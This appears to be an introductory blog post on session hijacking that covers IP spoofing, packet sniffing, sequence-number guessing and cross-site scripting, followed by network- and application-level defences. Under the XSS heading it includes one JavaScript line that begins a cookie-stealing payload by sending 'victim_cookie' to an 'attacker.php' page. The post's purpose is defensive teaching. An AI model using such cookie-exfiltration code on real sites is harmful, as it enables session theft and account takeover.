While working with codes, the biggest issues which comes in picture is the security. There are multiple ways to secure your code from known threats, one on them is session hijacking.
What is session hijacking?
Well, session hijacking, in simple words can be understood as someone else showing your ID card to enter inside your premises.
Every time, when a client connects with server, s/he is provided with a unique session ID. This session ID is used for all the communications between the user and server.
Session hijacking is a TCP security attack on user session over a network. This is generally called as man-in-middle attack, as someone sitting between the client and server looks for the session details and then presents herself / himself as the client to the server.
There are a few common methods of session hijacking
- IP spoofing
- Cross site scripting
- Packet sniffing
- Bind attack
Spoofing simply means pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.
Cross site scripting (XSS)
var adr = '../attacker.php?victim_cookie='
Packet sniffing is a way of session hijacking similar to IP spoofing. In this an attacker sniffs into the network and finds a way to get the session ID packets between a user and server. Once the session details is retrieve by the attacker, s/he hits the server with the same session details and pretends to be the actual client.
This can be done using tools like packet sniffer.
In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.
If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.
To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSec, SSL, SSH etc. Internet security protocol (IPSec) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.
Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.
At Network Level – You can implement SSL for allowing users to access website with https. You can add firewalls and add rules to secure you from attacks. The firewalls will also help you create tunnel for data transfer. You can use VPN for more secure network.
At Application Level – You can implement single session concept, this will ensure only a single session ID, that to from a single IP is accessing the server. You can reset sessions in a fixed interval of time and can encrypt all the data before sending it to client. Also, to prevent Cross site scripting(XSS), you can strip tags, can use X-XSS-Protection Header in your code, and multiple other options are there.
You can understand how to secure your network here